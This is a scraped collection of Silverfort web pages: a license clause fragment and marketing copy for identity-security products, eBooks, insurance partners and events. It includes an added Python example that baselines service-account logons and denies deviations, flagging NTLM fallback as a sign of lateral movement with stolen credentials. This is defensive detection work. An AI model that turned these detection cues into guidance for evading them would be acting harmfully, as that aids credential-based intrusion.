3.3. In the event Licensee fails to comply with any applicable data privacy law or regulation and/or (ii) fails to comply with any provision of the DPA then: (a) to the maximum extent permitted by law, Licensee shall be solely and fully responsible and liable for any such breach, violation, infringement and/or processing of Personal Data by Silverfort or any of Silverfort’s affiliates or subsidiaries (including, without limitation, Silverfort’s employees, officers, directors, subcontractors and agents), and the consequences of any of the foregoing; (b) in the event of any claim of any kind related to any such breach, violation or infringement and/or any claim related to processing of Personal Data, Licensee shall defend, hold harmless and indemnify Silverfort and Silverfort’s affiliates and subsidiaries (including, without limitation, their employees, officers, directors, subcontractors and agents) from and against any and all losses, penalties, fines, damages, liabilities, settlements, costs and expenses, including reasonable attorneys’ fees; and (c) the limitation of Licensee’s liability under Section 11 below shall not apply with respect to paragraphs (a) and (b) above.

4. Software Usage. If requested by Silverfort, Licensee shall disclose the total number of Protected and Monitored User Accounts which utilize the Software, in order to verify that usage of the Software is made in accordance with the terms of the Order Form.

5. Payments. The license granted hereunder and the provision of Support Services, if applicable, are subject to the full payment of the applicable fees due to Silverfort.

6. U.S. Government Use. The Software is a "commercial computer software" and a "commercially available off-the-shelf (COTS) item" as defined under FAR 2.101, developed entirely at the private expense of Silverfort.
If licensed by or on behalf of a US federal, state or local government agency (“Government”), the Government acquires a license to the Software, subject to the terms of this Agreement. This Section is in lieu of and supersedes any other Federal Acquisition Regulation, Department of Defense Federal Acquisition Regulation Supplement or any other clause or provision that addresses government rights in computer software, technical data...

---
- Published: 2024-09-04
- Modified: 2025-08-21
- URL: https://www.silverfort.com/

The identity security platform you deserve. Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human, AI, or machine, cloud or on-prem. Trusted by 1,000+ organizations around the world. Rated 4.8 on Gartner Peer Insights.

Where’s the gap in your identity defense?
- Privileged Access Security
- Non-Human Identity Security
- Active Directory Service Account Security
- Extending Multi-Factor Authentication
- Authentication Firewall
- Identity Threat Detection and Response
- AI Agent Security

The #1 attack surface. Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. Too many systems and resources are left exposed and unprotected, creating countless security blind spots.

Why Silverfort: The Silverfort identity security platform secures your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources, all the time.
- End-to-end: Identity protection for on-prem, cloud, humans and machines.
- Protect the unprotectable: Including systems that no other solution can cover.
- Zero changes: To your systems, minimizing disruptions and cost.

Proven technology. Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together.

"Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment." Tom Parker, VP of IT & CISO | Kayak

"We did a demo and POC, and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs." Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson

"Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money." William Woo, Group CIO | Singtel

“With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture.” Katie McMillan, Information Security Manager | Agilisys

---
- Published: 2024-09-04
- Modified: 2024-11-04
- URL: https://www.silverfort.com/thank-you-for-downloading-rethinking-ransomware-protection-ebook-2/

---
- Published: 2024-09-04
- Modified: 2024-11-04
- URL: https://www.silverfort.com/thank-you-for-downloading-silverfort-adaptive-authentication-white-paper-2/

---
- Published: 2024-08-29
- Modified: 2024-11-04
- URL: https://www.silverfort.com/solving-the-top-five-pam-challenges-of-identity-teams-ppc/

PAM solutions aim to address the challenge of protecting privileged accounts, both admin users and service accounts, from compromise. However, there are critical challenges around discovering and protecting admin users that must be overcome to successfully complete the PAM onboarding journey. Download this eBook to learn:
- Why only protecting the admins you know leaves critical users exposed to compromise.
- How service accounts introduce specific visibility and protection challenges to PAM solutions.
- How a Unified Identity Security platform can accelerate the PAM journey and eliminate its blind spots.

---
- Published: 2024-08-29
- Modified: 2024-11-04
- URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-ppc/

Within the challenge of Active Directory protection, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot and a veritable goldmine for attackers.
Download this eBook to learn: Why automating the discovery of service accounts is a must-have. How learning the behavior of each service account is the first step towards real-time protection. How to prevent adversaries from using compromised service accounts for malicious access. --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/re-evaluate-your-mfa-protection-ppc/ MFA protection in AD environments is only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. Download this eBook to learn: Why traditional MFA solutions can’t protect PsExec and PowerShell access. How you can assess your existing MFA protection to better understand your risk exposure. How you can gain end-to-end MFA coverage for all NTLM and Kerberos authentication in your AD environment. --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/eliminating-the-lateral-movement-blind-spot-with-itdr-thn/ Lateral movement is one of the most critical parts of a cyberattack and is often the stage in which a local event escalates into an organizational incident. Yet so far, the existing products within the identity and security stacks have failed to efficiently protect against this type of malicious activity. Explore this eBook to discover the core components of lateral movement attacks and why they’re a blind spot for today’s endpoint, network and PAM products. 
Topics covered include: Lateral movement protection checklist How lateral movement employs compromised credentials to spread in a targeted network How Identity Threat Detection and Response (ITDR) mitigates lateral movement attacks by preventing them in real time And more --- - Published: 2024-08-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/eliminating-the-lateral-movement-blind-spot-with-itdr-thn-li/ Lateral movement is one of the most critical parts of a cyberattack and is often the stage in which a local event escalates into an organizational incident. Yet so far, the existing products within the identity and security stacks have failed to efficiently protect against this type of malicious activity. Explore this eBook to discover the core components of lateral movement attacks and why they’re a blind spot for today’s endpoint, network and PAM products. Topics covered include: Lateral movement protection checklist How lateral movement employs compromised credentials to spread in a targeted network How Identity Threat Detection and Response (ITDR) mitigates lateral movement attacks by preventing them in real time And more --- - Published: 2024-08-19 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-dark-side-of-ransomware-protection-ppc-aug24/ Can You Block Lateral Movement? Ransomware attacks are a top concern for enterprise security stakeholders, particularly the pairing of ransomware with automated propagation. Download this eBook to learn: Which MFA gaps ransomware attacks exploit. Why lateral movement is a blind spot for today’s security products. How attackers target privileged accounts to accelerate propagation. How Silverfort’s Unified Identity Protection platform proactively prevents ransomware propagation.
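The eBook blurbs above describe the same detection problem from two angles: learning each service account's normal behavior, and spotting compromised credentials as they spread laterally (typically PsExec-style network logons that fall back to NTLM). The following Python is an added example, not Silverfort's code and not taken from any of the eBooks. It learns a per-account baseline from constructed Windows Security event 4624-style logon records, then flags and denies logons that deviate. All account names, host names and records are constructed; the field names are a simplified stand-in for the 4624 fields (TargetUserName, WorkstationName, Computer, LogonType, AuthenticationPackageName) that a real feed from Get-WinEvent or a SIEM would supply.

```python
"""Service-account logon baselining with deny-on-deviation.

Added example; not Silverfort code. Every record, account name and host
name below is constructed for illustration.
"""
from collections import defaultdict

# Accounts the organisation has classified as service accounts (constructed).
# svc_etl is listed but has no baseline records, to show the cold-start case.
SERVICE_ACCOUNTS = {"svc_backup", "svc_sql", "svc_etl"}

# Learning window: logons observed while the accounts behaved normally (constructed).
# LogonType 3 = network, 2 = interactive, 10 = RemoteInteractive (RDP).
BASELINE_RECORDS = [
    {"account": "svc_backup", "src": "BKP01", "dst": "FS01",  "type": 3, "pkg": "Kerberos"},
    {"account": "svc_backup", "src": "BKP01", "dst": "FS02",  "type": 3, "pkg": "Kerberos"},
    {"account": "svc_sql",    "src": "APP01", "dst": "SQL01", "type": 3, "pkg": "Kerberos"},
]

INTERACTIVE_LOGON_TYPES = {2, 10}


def build_baseline(records):
    """Learn, per service account, the sources, destinations, logon types and
    authentication packages seen during the learning window."""
    profile = defaultdict(lambda: {"src": set(), "dst": set(), "type": set(), "pkg": set()})
    for r in records:
        if r["account"] not in SERVICE_ACCOUNTS:
            continue  # human users are out of scope for this baseline
        p = profile[r["account"]]
        p["src"].add(r["src"])
        p["dst"].add(r["dst"])
        p["type"].add(r["type"])
        p["pkg"].add(r["pkg"])
    return dict(profile)


def deviations(record, profile):
    """Return the list of ways a logon departs from the learned baseline.
    An empty list means the logon matches known behaviour."""
    acct = record["account"]
    if acct not in SERVICE_ACCOUNTS:
        return []
    p = profile.get(acct)
    if p is None:
        return ["service account has no learned baseline"]
    reasons = []
    if record["src"] not in p["src"]:
        reasons.append(f"new source host {record['src']}")
    if record["dst"] not in p["dst"]:
        reasons.append(f"new destination {record['dst']}")
    if record["type"] in INTERACTIVE_LOGON_TYPES:
        # A service account should never log on interactively; this is the classic
        # sign of a human (or attacker) using its credentials.
        reasons.append(f"interactive logon type {record['type']} for a service account")
    if record["pkg"] == "NTLM" and "NTLM" not in p["pkg"]:
        # PsExec/SMB lateral movement with a stolen password or hash typically shows
        # up as NTLM where the account normally authenticates with Kerberos.
        reasons.append("NTLM authentication where the account normally uses Kerberos")
    return reasons


def decide(record, profile):
    """Policy decision for one logon: 'allow' if it matches the baseline, else 'deny'."""
    return "deny" if deviations(record, profile) else "allow"


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_RECORDS)
    # Constructed: the backup account suddenly authenticates with NTLM from a finance
    # workstation to a domain controller, the pattern of credential-based lateral movement.
    suspicious = {"account": "svc_backup", "src": "WS-FIN-07", "dst": "DC01", "type": 3, "pkg": "NTLM"}
    print(decide(suspicious, baseline), deviations(suspicious, baseline))
```

The design choice worth noting is that the baseline is learned per account rather than per host: a service account's legitimate sources and destinations are usually a short, stable list, so a new source host or an NTLM fallback is a high-signal deviation, whereas the same events for a human user would be routine.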
--- - Published: 2024-08-12 - Modified: 2025-08-18 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/ Cyber Insurance Silverfort's Insurance Partner Ecosystem We collaborate with leading cyber insurance brokers to assist their clients in meeting stringent policy requirements, such as enforcing MFA on all admin access and securing privileged service accounts. Whether you're a recommending partner, referral partner, or reseller, our program is designed to support brokers in guiding their clients toward enhanced identity security and compliance. Become a partner Explore the ecosystem Browse our cyber insurance partners Arch is an S&P 500 company and leading diversified insurer and reinsurer, providing customised specialty risk solutions to clients worldwide across a wide range of industries. Learn more Beazley Security empowers clients with unparalleled cyber resilience, combining decades of technical expertise with the data-led approach of our parent company, global insurance provider Beazley Insurance. Learn more Crum & Forster (C&F) is a leading national property, casualty, and accident & health insurer, providing specialty insurance products through its admitted and surplus lines insurance companies. Learn more DUAL is one of the world’s largest international underwriting agencies, backed by many of the world’s most highly rated insurance and reinsurance capacity providers. Learn more GrECo is the leading risk consultants and insurance brokers in the CESEE region, providing optimum security for clients’ employee, operational and financial risks. Learn more Howden offers innovative insurance solutions, creating unique terms and comprehensive concepts like the cyber protection, backed by a network of specialists. Learn more The RiskPoint Group is one of Europe’s largest Managing General Underwriters (MGUs) and a Coverholder with Lloyd’s of London, providing best in class insurance solutions to businesses and their advisors globally. 
Learn more Sompo is a global provider of commercial and consumer property, casualty, and specialty insurance and reinsurance. Sompo employs approximately 9,500 people around the world who use their expertise to help simplify and resolve your complex challenges. Learn more SÜDVERS is a multi-award-winning global insurance and risk expert for medium-sized businesses and industry, offering tailored solutions for global risk protection. Learn more Willis, a WTW business, is a global leader in advisory, broking and solutions. Their comprehensive cyber risk approach assesses exposures, quantifies potential losses and optimizes risk transfer strategies to help clients protect and grow their businesses effectively. Learn more “As a group, we are dedicated to helping our customers get the most out of their cybersecurity insurance policy, which puts a responsibility on them to reach a certain level of maturity. Silverfort helps our customers achieve this by vastly reducing the identity attack surface, with MFA on all internal resources and protection for Service Accounts, all without having to go through a long and expensive deployment process. This reduces a large swathe of risk that would otherwise lead to successful ransomware attacks, data breaches and significant disruption.” Shay Simkin, Howden Group’s Global Head of Cyber Insurance “With changing market conditions, the cyber resilience of our insured clients is becoming increasingly important for DUAL. Through DUAL Cyber Active Protect and our strategic partnership with Silverfort, we not only provide a sustainable, easily accessible, all-in-one security and insurance package, but also enable insureds to proactively reduce identity-related risks. This includes enterprise-grade protection for service accounts, MFA enforcement across critical systems, and real-time visibility into exposure—all without the complexity of traditional deployments.
This partnership allows us to reduce insurance premiums by applying best-in-class underwriting standards and significantly lowering the risk of ransomware and identity-based attacks.” Ali Khodabakhs, Head of DUAL Cyber Europe & Managing Director DUAL CPR Join this upcoming webinar to discuss the key challenges organizations face in managing identity across hybrid environments.
During this session, you will hear: Stories from the trenches from cybersecurity experts including identity specialists, legal experts, and cybersecurity strategy advisors. Discussions on scalable strategies for managing service accounts, securing third-party access, and curbing privilege sprawl. Real-world case studies will highlight credential abuse, automation blind spots, and how Zero Trust architectures are reshaping security across the financial ecosystem. Register here Free guide Cyber Insurance: The complete guide for modern businesses In this guide, you’ll discover: What cyber insurance actually covers — and where its limits are. Why coverage matters now more than ever. Key terms and definitions every decision-maker should understand. Common misconceptions that leave businesses exposed. Practical tips for aligning cyber insurance with your security strategy. Whether you’re a CISO, risk manager, or executive, this article equips you with the knowledge to navigate complex policies, evaluate your readiness, and avoid costly gaps. Read the full guide to gain the insights you need to protect your organization with confidence. Read the guide Learn more about Silverfort and cyber insurance Talk to the team Chat with our experts. In your personal demo, you will learn how Silverfort can help your insureds: Secure their entire IAM infrastructure from within. Discover and protect every dimension of their identity, everywhere. Gain maximum security with minimal effort. Rated 4.8 on Gartner Peer Insights --- - Published: 2024-08-07 - Modified: 2025-02-23 - URL: https://www.silverfort.com/ea-program/ Join the Silverfort Early Availability Program Shape the Future of Cybersecurity with Silverfort Welcome to the Silverfort Early Availability (EA) Program! We’re excited to offer you the opportunity to be at the forefront of Identity Protection innovation.
By joining our EA Program, you’ll gain exclusive early access to our latest features and updates, and play a vital role in shaping the future of our products. Current EA Programs Available Silverfort v5.2 Be the first to experience cutting-edge innovations in identity protection. Join this program to be at the forefront of the latest product features. Privileged Access Security (PAS) PAS will enable organizations to reduce privileged accounts by 90% by applying zero standing privileges through easy and scalable access policies. Why join the Silverfort EA Program Early access to cutting-edge features Be the first to experience and test our newest advancements in Identity Protection and stay ahead of emerging threats with the latest tools and updates. Direct feedback loop Share your insights directly with our development team. Influence the design and functionality of Silverfort products to better meet your needs. Exclusive perks Enjoy special benefits, including priority support and access to exclusive content. Receive invitations to webinars, training sessions, and events tailored for our EA community. How to join our Early Availability Program Becoming a part of our EA Program is easy. Simply fill out the registration form to get started. For more information about the Silverfort EA program, please reach out to your Customer Success Manager or message cs@silverfort.com with your details. Join the EA Program --- - Published: 2024-08-07 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-identity-risk-assessment-atg-sf/ Identify MFA and privileged access protection gaps with Alchemy Technology Group and Silverfort.
Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-08-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-identity-risk-assessment-gps-sf/ Identify MFA and privileged access protection gaps with GuidePoint Security and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-07-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-identity-risk-assessment-tv-sf/ Identify MFA and privileged access protection gaps with Tevora and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-07-18 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-thn-em-aud-jul-24/ Take Control Of Your Cyber Insurance Coverage Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. 
In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2024-07-18 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-thn-li-aud-jul-24/ Take Control Of Your Cyber Insurance Coverage Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2024-07-17 - Modified: 2025-04-16 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/the-riskpoint-group/ Silverfort's Cyber Insurance Ecosystem The Riskpoint Group The RiskPoint Group is one of Europe’s largest Managing General Underwriters (MGUs) and a Coverholder with Lloyd’s of London, providing best in class insurance solutions to businesses and their advisors globally. With 250+ employees and 16 locations in Europe, North America, and Asia Pacific, the RiskPoint Group employs expert underwriting and specialized, in-house claims teams. How Silverfort and The Riskpoint Group work together The RiskPoint Group launched CyberMultiplied in 2024, which aims to provide a package of services that will make cyber insurance and improved cyber security accessible for all businesses and organizations. 
We believe that Silverfort offers our insureds a powerful solution to protect their critical administrative accounts, including some of the most vulnerable accounts that are associated with legacy Windows applications. Contact us to get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2024-07-12 - Modified: 2024-09-12 - URL: https://www.silverfort.com/webinar-on-demand-top-criteria-itdr-solutions/ Webinar on Demand: Top 5 Evaluation Criteria for ITDR Solutions https://www.youtube.com/watch?v=9zS0mCsjzQA --- - Published: 2024-07-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-insurance-free-assessment-nc-sf/ Identify MFA and privileged access protection gaps with Novacoast and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2024-06-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-compliance/ See Silverfort in action – fill out the form to instantly schedule a demo. Compliance with regulations and standards is critical to every organization. Silverfort assists you in meeting the identity protection requirements, with its MFA, PAM, and service account protection. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2024-06-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-pam/ See Silverfort in action – fill out the form to instantly schedule a demo.
Silverfort’s platform provides an unmatched 360-degree insight into all your privileged accounts within days, automating what has been until now a manual and complex operation that often took years to complete. Leverage Silverfort to discover all privileged users and service accounts, including undocumented ones, and map their dependencies to simplify their onboarding into your PAM, without the risk of breaking the various systems that rely on them. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2024-06-12 - Modified: 2024-11-04 - URL: https://www.silverfort.com/zero-trust-ebook-thn-aud/ Zero Trust in the identity control plane means the ability to ensure that user access to any on-prem or cloud resource is never granted unless it’s been analyzed and verified. However, while the vision is clear and intuitive, many organizations struggle with its implementation in practice. In this eBook, we outline a framework that will help bring your Zero Trust strategy to fruition. Gain insights into topics, including: Why the identity control plane is the natural place to begin your Zero Trust journey. The 4 pillars of implementing Identity Zero Trust in your environment. Requirements for taking a “never trust, always verify” approach to every authentication. --- - Published: 2024-06-12 - Modified: 2024-11-04 - URL: https://www.silverfort.com/zero-trust-ebook-thn-li-aud/ Zero Trust in the identity control plane means the ability to ensure that user access to any on-prem or cloud resource is never granted unless it’s been analyzed and verified.
However, while the vision is clear and intuitive, many organizations struggle with its implementation in practice. In this eBook, we outline a framework that will help bring your Zero Trust strategy to fruition. Gain insights into topics, including: Why the identity control plane is the natural place to begin your Zero Trust journey. The 4 pillars of implementing Identity Zero Trust in your environment. Requirements for taking a “never trust, always verify” approach to every authentication. --- - Published: 2024-06-07 - Modified: 2025-02-23 - URL: https://www.silverfort.com/identity-security-alliance-partner-directory/ Identity security alliance Find a partner Our Identity Security Alliance is helping businesses take their identity security where it has never gone before. Find a partner in the directory below. Apono Just-In-Time Access. Automatic granular permissions needed to keep your business running and secure. Visit Apono Axonius The Axonius Platform is the system of record for all digital infrastructure to let IT and security teams understand all assets, their relationships, and business-level context. Visit Axonius Check Point Check Point Software Technologies is a global leader in cyber security solutions, dedicated to protecting corporate enterprises and governments worldwide. Visit Check Point CyberArk The CyberArk identity security platform is the first line of defense against malicious actors and unauthorized access to protect what matters most. Visit CyberArk DUO Connect and protect your employees, business partners and customers with identity-powered security. Visit Duo Entro A pioneer in non-human identity management, Entro enables organizations to securely utilize non-human identities and secrets, overseeing their usage and automating their lifecycle from inception to rotation. 
Visit Entro Exabeam The world’s most advanced cloud-native security operations platform, powered by AI, delivering superior threat detection, investigation, and response (TDIR). Visit Exabeam HYPR HYPR’s identity security solution empowers you to continuously detect, prevent, and eliminate identity-related risks for your workforce and customers. Visit HYPR Infinipoint Infinipoint is the Zero Trust Workforce Access Platform, authenticating, securing and verifying both user and device, at the point of access, and continuously throughout every session. Visit Infinipoint Microsoft Silverfort and Microsoft’s product integrations help organizations to consolidate their IAM across hybrid environments, extend identity protection to any asset, and simplify cloud migration. Learn more about Silverfort & Microsoft Okta The leader in secure access and identity management and authentication. Visit Okta Palo Alto Networks Palo Alto Networks, the global cybersecurity leader, continually delivers innovation to enable secure digital transformation—even as the pace of change is accelerating. Visit Palo Alto Networks Ping Identity Ping Identity helps you protect your users and every digital interaction they have while making experiences frictionless. Visit Ping Identity RSA RSA provides identity security solutions for the world’s most security-sensitive organizations. Visit RSA Red Access Red Access helps companies secure all their browsing activities in the complexity of in-office and hybrid work. Visit Red Access ServiceNow We help organizations of every size, in every industry, put AI to work for people. Visit ServiceNow Sgnl Context changes everything: Limit the blast radius of a breach with modern privileged identity management and protect your critical systems. Visit Sgnl StrongDM StrongDM is a Dynamic Access Management platform that goes beyond the capabilities of traditional PAM solutions to support all modern infrastructure. 
Visit StrongDM Torq Torq delivers the security industry’s first enterprise-grade hyperautomation platform capable of automating the most complex security infrastructures at dramatic scale. Visit Torq Valence Find and fix your SaaS risks with the only SaaS security platform that brings together security teams and business users to effectively manage SaaS security posture and remediate risks. Visit Valence Security Veza Veza, the Identity Security company, has cracked the code on cybersecurity’s hardest question: “Who can take what action on what data?” Visit Veza Wiz Use the Wiz Cloud Security Platform to build faster in the cloud, enabling security, dev and devops to work together in a self-service model built for the scale and speed of your cloud development. Visit Wiz --- - Published: 2024-06-05 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/identity-security-posture-management/ Identity Security Posture Management (ISPM) Find, fix and fortify every identity weakness, everywhere You can't protect yourself from the risks you can't see. Enhance your resilience with automated discovery and rapid mitigation of the weaknesses that expose your hybrid environment to identity threats. Get a demo or Take a tour Strengthen your resilience against identity threats. Patented in-line protection allows our platform to seamlessly extend throughout your identity infrastructure, so you get comprehensive visibility into all security weaknesses stemming from misconfigurations, malpractices, legacy infrastructure, and insecure settings. Practical insights from actual user access. Informed by a holistic view of your systems and infrastructure, our platform analyzes real human and non-human user access activities to disclose insecure protocol usage and access patterns. Unified on-prem & cloud analysis. Our platform offers full visibility into the intersections between environments, where your on-prem identity security weaknesses expose your cloud to attack.
Active exposure mitigation. Mitigate any weaknesses and exposures you discover with actionable guidance and our MFA and authentication firewall policies. Learn more about our platform Comprehensive visibility. Actionable insights. Discover Know your identity threat exposure Get a consolidated view of all the weaknesses that expose your environment to credential access and privilege escalation. Analyze Prioritize the risks that matter most Focus on the most critical threats and optimize your exposure management efforts with our probability and impact-based ISPM scoring. Optimize Enhance your identity threat resilience Fix weaknesses and exposures by resolving misconfigurations and legacy settings or enforcing Silverfort’s MFA and Authentication firewall policies. How Silverfort powers your identity security posture. Take a tour of ISPM Enhanced identity resilience across your entire environment. “With the help of Silverfort, we were able to fill a critical gap in our identity security which we were experiencing, which was key for our overall security posture. ” Katie McMillan, Agilisys’s Information Security Manager. The challenge Due to the different security challenges and increased awareness of identity-based attack methods, Agilisys needed to strengthen their security posture and hygiene and fit all their identity security needs. Our solution With Silverfort, Agilisys improved its organizational security hygiene by enforcing universal, adaptive MFA and gaining insights into all their users’ activity. Learn more Explore blog --- - Published: 2024-05-16 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/authentication-firewall/ Authentication Firewall Boost your environment’s resilience with the power of deny. Protect your identity infrastructure from within. Govern and control users’ access based on their identity with no infrastructure changes with Silverfort’s authentication firewall. 
Get a demo or Take a tour Power up your access controls with our authentication firewall. Divide your environment into logical access segments with the flexibility to change them dynamically in a single click. Protect the full scope Cover the full range of your AD managed resources with access policies across all servers, applications, and IT infrastructure. Reduce the attack surface Enhance security posture by blocking access when insecure protocols are used or users have a misconfiguration that puts them at risk of compromise. Contain active attacks Freeze all access to some or all of your environment when a breach is detected. Learn more about our platform Control access to every resource in a single click. Protect Block access based on identity Automatically deny access in real time when an authentication attempt or access request violates access policy conditions. Secure Enforce least privilege access policies Segment your environment so users can only access the resources they need to carry out their work – and nothing beyond that. How Silverfort stops malicious access in real time. Take a tour of Authentication Firewall Embracing the power of deny to strengthen security posture and mitigate threats. “Silverfort’s authentication firewall has helped us to apply deny access policies across our organization, which has significantly strengthened our security posture. We’ve been able to effectively mitigate identity threats by ensuring only authenticated users have access to our resources.” Head of IAM of a leading retail organization The challenge The company realized it needed to strengthen its security posture across its entire organization due to the various identity security risks posed by its users when accessing corporate resources. They needed to be able to limit who was allowed to access which resources and systems.
Our solution With Silverfort, the company has adopted the principle of least privilege by creating group-segmented access policies and applying deny access policies on user groups when needed. Now the company can enforce more strict access controls on each user, resulting in a more powerful security posture for the entire company. Learn more Explore blog --- - Published: 2024-05-09 - Modified: 2024-11-04 - URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-thn-li/ In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers. Download this eBook to learn: Why service accounts are so difficult to protect. Which approaches currently exist to mitigate this risk and their limitations. How to automatically discover, monitor and protect every service account in your environment. --- - Published: 2024-05-03 - Modified: 2025-08-18 - URL: https://www.silverfort.com/events/ Meet the team wherever you are. Browse by region or join us for an online event. US & Canada EMEA APAC Online In person: EMEA Gartner Security & Risk Management Summit 22 – 24 September 2025 London, UK Test Flight World Tour 2025 Buckle up for the Silverfort Test Flight World Tour, a hands-on identity security experience like no other. Join us for live, complimentary sessions across the globe where you'll see what teams can achieve with identity security done right. Check out our upcoming Test Flights below. Learn more about Test Flight here Browse by region US & Canada EMEA APAC Online & Webinars US & Canada 20 August 2025 Silverfort is looking forward to meaningful conversations with cybersecurity leaders at the Chicago CISO Dinner this August! 
Chicago, IL, US 26 August 2025 Cincinnati, we’re coming for you! Silverfort can’t wait to talk identity security at the August CISO Dinner. Cincinnati, OH, US 21 August 2025 We’re heading to CXO CISOMeet in Atlanta! Catch the Silverfort team at the event — let’s talk identity security. Atlanta, US 9 September 2025 The CXO CISOMeet in Columbus is around the corner and we can’t wait to talk all things identity security! Columbus, OH, US 9 September 2025 Silverfort is excited to connect with Cybersecurity leaders at the CISO Leadership Exchange in Milwaukee, WI this September! Milwaukee, WI 10 - 11 September 2025 The future of identity security is taking shape at Identity Week, and Silverfort will be there to help lead the conversation. See you there! Washington DC, US 24 – 26 September 2025 Visit us at booth #Ex14 to discover how Silverfort and Okta work together to secure every identity. Las Vegas, NV, US 30 September 2025 Planning to be at GBI Impact? So are we! Stop by and say hello to the Silverfort crew. Boston, US 30 September 2025 Going to HouSecCon this year? Stop by our booth and let’s chat all things cybersecurity! Houston, TX, US 5 - 7 October 2025 If you're heading to Innovate 2025, make sure to catch up with Silverfort to discover how we're securing every identity. Scottsdale, AZ, US 7 October 2025 Silverfort is looking forward to attending IANS Atlanta this year. Let’s explore the latest in cybersecurity together. Atlanta, US 8 October 2025 We're heading to the Rochester Security Summit! We can’t wait to join the conversation. New York, US 14 October 2025 Join us at IANS Boston! We're looking forward to insightful discussions with security leaders. Boston, US 23 October 2025 Silverfort will be at CXO CISOMeet – Boston to connect with fellow CISOs and executives shaping the future of cybersecurity. Let’s catch up! Boston, US 28 October 2025 Silverfort is heading to IANS New York!
